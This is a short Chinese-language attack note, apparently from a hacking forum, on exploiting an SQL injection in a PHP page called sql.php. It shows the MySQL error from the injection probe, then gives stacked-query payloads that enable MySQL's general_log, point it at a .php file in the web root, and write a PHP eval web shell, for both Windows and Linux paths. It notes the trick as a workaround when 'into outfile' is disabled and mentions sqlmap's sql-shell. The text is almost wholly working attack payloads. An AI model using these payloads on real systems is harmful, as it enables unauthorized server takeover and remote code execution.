sql.php?sql=1'
报错信息为:
1064:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' ) LIMIT 1' at line 1 [ SQL语句 ] : SELECT COUNT(*) AS ts_name FROM `t00ls_type` WHERE (1' ) LIMIT 1
报错信息为:
1064:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' ) LIMIT 1' at line 1 [ SQL语句 ] : SELECT COUNT(*) AS ts_name FROM `t00ls_type` WHERE (1' ) LIMIT 1
into outfile函数禁用..无法写入一句话.利用phpmyadmin log技巧成功搞定
sql.php?sql=1);set global general_log='on';#
sql.php?sql=1);set global general_log_file='d:\\wwwroot\\web\\1.php';#
sql.php?sql=1);select '<?php @eval($_POST[t00ls]);?>';%23
如可以多句执行,可以直接用sqlmap -sql-shell来执行就好
outfile被禁止的情况下:
show variables like '%general%';
set global general_log = on;
set global general_log_file = '/var/www/html/1.php';
select '<?php eval($_POST[cmd]);?>